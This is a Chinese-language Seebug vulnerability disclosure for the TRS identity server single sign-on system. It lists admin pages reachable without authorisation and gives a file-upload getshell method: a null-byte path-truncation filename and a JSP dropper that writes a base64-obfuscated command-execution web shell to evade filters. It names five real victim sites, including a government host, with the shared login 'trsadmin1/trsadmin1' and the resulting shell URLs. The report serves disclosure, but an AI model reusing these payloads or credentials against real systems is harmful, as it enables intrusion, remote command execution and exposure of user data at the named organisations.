拓尔思某系统越权操作大集合及GETSHELL

2015-01-17T00:00:00
ID SSV:94697
Type seebug
Reporter Root
Modified 2015-01-17T00:00:00

Description

简要描述:

老版本 和 二次开发的貌似部分不受影响... 安全无止境!

详细说明:

/ 说明: Copyright ©2004 - 2006 TRS 不受影响 Copyright ©2004 - 2008 TRS 不受影响 以及部分二次开发的不受影响 -------------------------------------- 越权可查看用户信息,几个案例用户加加都有上百万了~ / 程序名称:TRS身份服务器单点登录系统 漏洞类型:越权操作 & 任意文件上传GETSHELL 漏洞文件: 越权操作的(多少个点我也没数,反正就那么多):

/ids/admin/sys/system/editSysParaCfg.jsp 系统参数设置 /ids/admin/sys/system/editRegCfg.jsp 系统注册相关参数设置 (可改接收邮箱...) /ids/admin/sys/system/editRealNameCfg.jsp 实名认证相关参数设置(可设置上传路径及上传类型) /ids/admin/sys/system/editLoginCfg.jsp 用户登录相关参数配置 /ids/admin/sys/verifyCode/editVerifyCodeParaCfg.jsp 验证码参数设置 /ids/admin/sys/navigation.jsp 系统配置 /ids/admin/notifycation/list.jsp 邮件发送列表 /ids/admin/notifycation/detailMessage.jsp?id=xxx 通知模块(里面都是注册密码明文) /ids/admin/user/list.jsp 用户列表(可重置密码) /ids/admin/ldap/domain/config_dir.jsp LDAP目录设置信息 /ids/admin/ad/domain/add.jsp 增加域啥信息 /ids/admin/sys/database/viewDbInfoCfg.jsp 查看数据库连接 /ids/admin/sys/http/edit.jsp HTTP参数设定 ids/admin/sys/accessPermission/edit.jsp 访问控制全局参数设定 /ids/admin/sys/auth/editCACfg.jsp 证书参数设置 /ids/admin/sys/customfield/addColumn.jsp?boName=User 添加属性 /ids/admin/sys/customfield/list.jsp 属性列表 /ids/admin/sys/group/editGroupAttributesMapping.jsp 机构参数设置 /ids/admin/sys/sso/edit.jsp 跨域单点登录参数设定 /ids/admin/sys/synchronize/synchronizationConfig.jsp 同步服务器参数设定 http://idss.haier.net/ids/admin/sys/synchronize/listSynchronizer.jsp 同步服务器列表 /ids/admin/coapp/viewUserSynchronization.jsp 系统[ids]的用户同步配置 /ids/admin/archivelog/config.jsp 是否日志归档

任意文件上传: account/uploadAuthInfo.jsp 利用方式:

if (this.realNameAuthenticationService.isApply(userName)) {//如果上传过,文件名用用户名命名,文件名可控,导致可截断上传 UserRealNameInfo uRealNameInfo = null; uRealNameInfo = this.realNameAuthenticationManager.find(userName); uploadFile = this.imageFileManager.find(uRealNameInfo.getUploadFileId()); uploadFile.setNewFileName(userName + "." + fileType); uploadFile.setUploadTime(System.currentTimeMillis()); uploadFile.setOriginalFileName(fileName); uploadFile.setFileSize(fileSize); uploadFile.setImageUrl(uploadPath); uploadFile.setType(type); this.imageFileManager.update(uploadFile); LOG.debug("update User realName authentication upload file success :" + uploadFile); } else { uploadFile.setNewFileName(userName + "." + fileType);//同上,这里是第一次上传走这里 uploadFile.setUploadTime(System.currentTimeMillis()); uploadFile.setOriginalFileName(fileName); uploadFile.setFileSize(fileSize); uploadFile.setImageUrl(uploadPath); uploadFile.setNewFileName(DateUtil.timeMillisToString(System.currentTimeMillis(), "yyyyMM") + File.separator + uploadFile.getNewFileName()); uploadFile.setType(type); this.imageFileManager.add(uploadFile); LOG.debug("add User realName authentication upload file success :" + uploadFile); }

因为trs默认上传到/WEB-INF/private/目录下,这里有两种方式来突破,一种是通过文件名来跳转:/../../../username.jsp%00.jpg ,这样就会在/ids/目录下生成shell文件。另一种是通过/ids/admin/sys/system/editRealNameCfg.jsp 实名认证相关参数设置(可设置上传路径及上传类型)配置上传路径,这样只需要文件名username.jsp%00.jpg截断即可,文件是存放在/ids/设置的目录/当前年月/用户名.jsp 实例1: http://idss.haier.net/ids/
用户名密码:trsadmin1/trsadmin1 上传后shell地址:http://**.net/ids/account/201501/trsadmin1.jsp

<img src="https://images.seebug.org/upload/201501/171532549f9a945d9182789bf22e64970d4de276.jpg" alt="1.jpg" width="600" onerror="javascript:errimg(this);">

实例2: http://app.sdwr.gov.cn/ids/admin/login.jsp 用户名密码:trsadmin1/trsadmin1 shell地址:http://app.****.gov.cn/ids/trsadmin1.jsp

<img src="https://images.seebug.org/upload/201501/1715354376eaf7d2d89013d6aec061bbdcd13609.jpg" alt="1.jpg" width="600" onerror="javascript:errimg(this);">

实例3: http://ids.shjnet.cn/ids/admin/login.jsp 用户名密码:trsadmin1/trsadmin1 shell地址:http://ids.*.cn/ids/201501/trsadmin1.jsp

<img src="https://images.seebug.org/upload/201501/171537277c949be92946e1102078bf66b9cb2c49.jpg" alt="1.jpg" width="600" onerror="javascript:errimg(this);">

实例4: http://www.catr.cn/ids/ 用户名密码:trsadmin1/trsadmin1 shell:http://www.****.cn/ids/trsadmin1.jsp

<img src="https://images.seebug.org/upload/201501/171540270c323218ccb425187f248b29531431a7.jpg" alt="1.jpg" width="600" onerror="javascript:errimg(this);">

实例5: http://www.hisense.com/ids/ 用户名密码:trsadmin1/trsadmin1 这个有过滤,对提交的inputstream有检查,有exec、XXXputStream等关键字都过滤,一般shell里都带有这样的关键字,这里可以通过trsids-server.jar本身提供的FileUtil来实现写shell: com.trs.idm.utilFileUtil.class中,我们只需要这两个函数足矣

public static void createTxtFile(File f) { if (!f.exists()) { try { f.createNewFile(); } catch (IOException e) { LOG.error("error while create new file: " + f, e); } LOG.debug(f + "已创建!"); } else { LOG.debug(f + "已已存在!"); } } public static void out(File f, String str) { out(f, str, ""); } public static void out(File f, String str, String enc) { if (StringHelper.isEmpty(enc)) { enc = "UTF-8"; } FileOutputStream fos = null; OutputStreamWriter out = null; BufferedWriter writer = null; try { fos = new FileOutputStream(f, true); out = new OutputStreamWriter(fos, enc); writer = new BufferedWriter(out); writer.write(str); writer.newLine(); writer.flush(); LOG.debug("write str: " + str + " to file: " + f); } catch (IOException e) { LOG.error("error while write string: " + str + " to file: " + f, e); try { if (writer != null) { writer.close(); writer = null; } if (out != null) { out.close(); out = null; } } catch (IOException e) { LOG.error("error while close writer and out", e); } } finally { try { if (writer != null) { writer.close(); writer = null; } if (out != null) { out.close(); out = null; } } catch (IOException e) { LOG.error("error while close writer and out", e); } } }

/ 调用已知jar文件中的工具类,突破数据流检测,成功getshell / <%@ page import="sun.misc.BASE64Decoder,java.io.,java.util.*,com.trs.idm.util.FileUtil" contentType="text/html;charset=UTF-8"%>//引入FileUtil <% String str = "/TRS/TRSIDS3.5/webapps/ids/account/trsadmin11.jsp"; File f = new File(str); FileUtil.createTxtFile(f); StringBuffer sb = new StringBuffer(""); sb.append("PCVAIHBhZ2UgaW1wb3J0PSJqYXZhLmlvLioiICU+PCV0cnkge1N0cmluZyBjbWQgPSByZXF1ZXN0L"); sb.append("mdldFBhcmFtZXRlcigiY21kIik7UHJvY2VzcyBjaGlsZCA9IFJ1bnRpbWUuZ2V0UnVudGltZSgpLmV"); sb.append("4ZWMoY21kKTtJbnB1dFN0cmVhbSBpbiA9IGNoaWxkLmdldElucHV0U3RyZWFtKCk7aW50IGM7d2hpbG"); sb.append("UgKChjID0gaW4ucmVhZCgpKSAhPSAtMSkge291dC5wcmludCgoY2hhciljKTt9aW4uY2xvc2UoKTt0cn"); sb.append("kge2NoaWxkLndhaXRGb3IoKTt9IGNhdGNoIChJbnRlcnJ1cHRlZEV4Y2VwdGlvbiBlKSB7ZS5wcmludFN"); sb.append("0YWNrVHJhY2UoKTt9fSBjYXRjaCAoSU9FeGNlcHRpb24gZSkge1N5c3RlbS5lcnIucHJpbnRsbihlKTt9JT4="); String base64_str = new String((new BASE64Decoder()).decodeBuffer(sb.toString())); FileUtil.out(f,base64_str); %> 上传上面的文件,配合用户名那的截断,然后访问用户名.jsp,会在指定的文件夹下生成shell文件 shell地址:http://www.**.com/ids/account/trsadmin11.jsp?cmd=id

<img src="https://images.seebug.org/upload/201501/1715492762826bd3d5e0e8b5d6623946ea746905.jpg" alt="1.jpg" width="600" onerror="javascript:errimg(this);">